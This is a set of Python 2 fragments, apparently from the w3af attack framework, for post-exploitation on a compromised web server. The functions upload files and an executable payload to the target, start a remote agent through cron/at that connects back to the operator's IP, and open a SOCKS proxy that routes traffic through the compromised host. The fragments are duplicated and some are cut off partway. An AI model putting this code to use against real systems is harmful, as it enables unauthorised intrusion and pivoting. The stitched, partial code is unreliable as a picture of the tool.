def write(self, remote_filename, file_content):
"""
Write a the contents of the parameter "file_content" to the
"remote_filename" file in the remote filesystem.
:param remote_filename: The filename where to write the file_content
:param file_content: The string to write in the remote file
:return: The message to show to the user.
"""
if not self._transfer_handler:
# Get the fastest transfer method
ptf = payload_transfer_factory(self.execute)
self._transfer_handler = ptf.get_transfer_handler()
if not self._transfer_handler.can_transfer():
return 'Failed to transfer, the transfer handler failed.'
else:
estimatedTime = self._transfer_handler.estimate_transfer_time(
len(file_content))
om.out.debug('The file transfer will take "' + str(
estimatedTime) + '" seconds.')
self._transfer_handler.transfer(file_content, remote_filename)
om.out.debug('Finished file transfer.')
return 'File upload was successful.'
def write(self, remote_filename, file_content):
"""
Write a the contents of the parameter "file_content" to the
"remote_filename" file in the remote filesystem.
:param remote_filename: The filename where to write the file_content
:param file_content: The string to write in the remote file
:return: The message to show to the user.
"""
if not self._transfer_handler:
# Get the fastest transfer method
ptf = payload_transfer_factory(self.execute)
self._transfer_handler = ptf.get_transfer_handler()
if not self._transfer_handler.can_transfer():
return 'Failed to transfer, the transfer handler failed.'
else:
estimatedTime = self._transfer_handler.estimate_transfer_time(
len(file_content))
om.out.debug('The file transfer will take "' + str(
estimatedTime) + '" seconds.')
self._transfer_handler.transfer(file_content, remote_filename)
om.out.debug('Finished file transfer.')
return 'File upload was successful.'
def write(self, remote_filename, file_content):
"""
Write a the contents of the parameter "file_content" to the
"remote_filename" file in the remote filesystem.
:param remote_filename: The filename where to write the file_content
:param file_content: The string to write in the remote file
:return: The message to show to the user.
"""
if not self._transfer_handler:
# Get the fastest transfer method
try:
ptf = payload_transfer_factory(self.execute)
self._transfer_handler = ptf.get_transfer_handler()
except BaseFrameworkException, e:
return '%s' % e
def write(self, remote_filename, file_content):
"""
Write a the contents of the parameter "file_content" to the
"remote_filename" file in the remote filesystem.
:param remote_filename: The filename where to write the file_content
:param file_content: The string to write in the remote file
:return: The message to show to the user.
"""
if not self._transfer_handler:
# Get the fastest transfer method
try:
ptf = payload_transfer_factory(self.execute)
self._transfer_handler = ptf.get_transfer_handler()
except BaseFrameworkException, e:
return '%s' % e
def _send_exe_to_server(self, exe_file):
"""
This method should be implemented according to the remote operating
system. The idea here is to send the exe_file to the remote server and
save it in a file.
:param exe_file: The local path to the executable file
:return: The name of the remote file that was uploaded.
"""
om.out.debug('Called _send_exe_to_server()')
om.out.console(
'Wait while w3af uploads the payload to the remote server...')
ptf = payload_transfer_factory(self._exec_method)
# Now we get the transfer handler
wait_time_for_extrusion_scan = ptf.estimate_transfer_time()
transferHandler = ptf.get_transfer_handler()
if not transferHandler.can_transfer():
raise BaseFrameworkException(
'Can\'t transfer the file to remote host,'
' can_transfer() returned False.')
else:
om.out.debug('The transferHandler can upload files to the remote'
' end.')
estimatedTime = transferHandler.estimate_transfer_time(
len(exe_file))
om.out.debug('The payload transfer will take "' +
str(estimatedTime) + '" seconds.')
self._remote_filename = get_remote_temp_file(self._exec_method)
om.out.debug('Starting payload upload, remote filename is: "' +
self._remote_filename + '".')
if transferHandler.transfer(
file(exe_file).read(), self._remote_filename):
om.out.console('Finished payload upload to "%s"' %
self._remote_filename)
return self._remote_filename
else:
raise BaseFrameworkException(
'The payload upload failed, remote md5sum is different.')
def _send_exe_to_server(self, exe_file):
"""
This method should be implemented according to the remote operating
system. The idea here is to send the exe_file to the remote server and
save it in a file.
:param exe_file: The local path to the executable file
:return: The name of the remote file that was uploaded.
"""
om.out.debug('Called _send_exe_to_server()')
om.out.console(
'Wait while w3af uploads the payload to the remote server...')
ptf = payload_transfer_factory(self._exec_method)
# Now we get the transfer handler
wait_time_for_extrusion_scan = ptf.estimate_transfer_time()
transferHandler = ptf.get_transfer_handler()
if not transferHandler.can_transfer():
raise BaseFrameworkException('Can\'t transfer the file to remote host,'
' can_transfer() returned False.')
else:
om.out.debug('The transferHandler can upload files to the remote'
' end.')
estimatedTime = transferHandler.estimate_transfer_time(
len(exe_file))
om.out.debug('The payload transfer will take "' +
str(estimatedTime) + '" seconds.')
self._remote_filename = get_remote_temp_file(self._exec_method)
om.out.debug('Starting payload upload, remote filename is: "' +
self._remote_filename + '".')
if transferHandler.transfer(file(exe_file).read(), self._remote_filename):
om.out.console(
'Finished payload upload to "%s"' % self._remote_filename)
return self._remote_filename
else:
raise BaseFrameworkException(
'The payload upload failed, remote md5sum is different.')
def run(self):
"""
Entry point for the whole process.
"""
# First, I have to check if I have a good w3afAgentClient to send to the
# other end...
try:
interpreter, client_code, extension = self._select_client()
except BaseFrameworkException:
om.out.error(
'Failed to find a suitable w3afAgentClient for the remote server.'
)
else:
#
# Get a port to use. Extrusion scan or any other method is applied here.
#
inbound_port = self._get_inbound_port()
#
# Start the w3afAgentServer on this machine
#
agent_server = w3afAgentServer(self._ip_address,
socks_port=self._socks_port,
listen_port=inbound_port)
self._agent_server = agent_server
agent_server.start()
# Wait for it to start.
time.sleep(0.5)
if not agent_server.is_running():
om.out.error(agent_server.get_error())
else:
#
# Now that everything is setup here, transfer the client
# to the remote end and run it.
#
ptf = payload_transfer_factory(self._exec_method)
transferHandler = ptf.get_transfer_handler(inbound_port)
if not transferHandler.can_transfer():
raise BaseFrameworkException(
'Can\'t transfer w3afAgent client to remote host, can_transfer() returned False.'
)
else:
# Let the user know how much time it will take to transfer the file
estimatedTime = transferHandler.estimate_transfer_time(
len(client_code))
om.out.debug('The w3afAgent client transfer will take "' +
str(estimatedTime) + '" seconds.')
filename = get_remote_temp_file(self._exec_method)
filename += '.' + extension
# Upload the file and check integrity
om.out.console(
'Starting w3afAgent client upload, remote filename is: "%s" ...'
% filename)
upload_success = transferHandler.transfer(
client_code, filename)
if not upload_success:
raise BaseFrameworkException(
'The w3afAgent client failed to upload. Remote file hash does NOT match.'
)
om.out.console('Finished w3afAgent client upload!')
# And now start the w3afAgentClient on the remote server using cron / at
self._delayedExecution(interpreter + ' ' + filename + ' ' +
self._ip_address + ' ' +
str(inbound_port))
#
# This checks if the remote server connected back to the agent_server
#
if not agent_server.is_working():
om.out.console(
'Something went wrong, the w3afAgent client failed to connect back.'
)
else:
msg = 'A SOCKS proxy is listening on %s:%s' % (
self._ip_address, self._socks_port)
msg += ' , all connections made through this daemon will be routed '
msg += ' through the compromised server. We recommend using the proxychains tool '
msg += ' ("apt-get install proxychains") to route connections through the proxy, the '
msg += ' proxy configuration should look like "socks4 %s %s"' % (
self._ip_address, self._socks_port)
om.out.console(msg)
def run(self):
"""
Entry point for the whole process.
"""
# First, I have to check if I have a good w3afAgentClient to send to the
# other end...
try:
interpreter, client_code, extension = self._select_client()
except BaseFrameworkException:
om.out.error('Failed to find a suitable w3afAgentClient for the remote server.')
else:
#
# Get a port to use. Extrusion scan or any other method is applied here.
#
inbound_port = self._get_inbound_port()
#
# Start the w3afAgentServer on this machine
#
agent_server = w3afAgentServer(self._ip_address,
socks_port=self._socks_port,
listen_port=inbound_port)
self._agent_server = agent_server
agent_server.start()
# Wait for it to start.
time.sleep(0.5)
if not agent_server.is_running():
om.out.error(agent_server.get_error())
else:
#
# Now that everything is setup here, transfer the client
# to the remote end and run it.
#
ptf = payload_transfer_factory(self._exec_method)
transferHandler = ptf.get_transfer_handler(inbound_port)
if not transferHandler.can_transfer():
raise BaseFrameworkException('Can\'t transfer w3afAgent client to remote host, can_transfer() returned False.')
else:
# Let the user know how much time it will take to transfer the file
estimatedTime = transferHandler.estimate_transfer_time(
len(client_code))
om.out.debug('The w3afAgent client transfer will take "' +
str(estimatedTime) + '" seconds.')
filename = get_remote_temp_file(self._exec_method)
filename += '.' + extension
# Upload the file and check integrity
om.out.console('Starting w3afAgent client upload, remote filename is: "%s" ...' % filename)
upload_success = transferHandler.transfer(
client_code, filename)
if not upload_success:
raise BaseFrameworkException('The w3afAgent client failed to upload. Remote file hash does NOT match.')
om.out.console('Finished w3afAgent client upload!')
# And now start the w3afAgentClient on the remote server using cron / at
self._delayedExecution(interpreter + ' ' + filename + ' ' + self._ip_address + ' ' + str(inbound_port))
#
# This checks if the remote server connected back to the agent_server
#
if not agent_server.is_working():
om.out.console('Something went wrong, the w3afAgent client failed to connect back.')
else:
msg = 'A SOCKS proxy is listening on %s:%s' % (
self._ip_address, self._socks_port)
msg += ' , all connections made through this daemon will be routed '
msg += ' through the compromised server. We recommend using the proxychains tool '
msg += ' ("apt-get install proxychains") to route connections through the proxy, the '
msg += ' proxy configuration should look like "socks4 %s %s"' % (self._ip_address, self._socks_port)
om.out.console(msg)
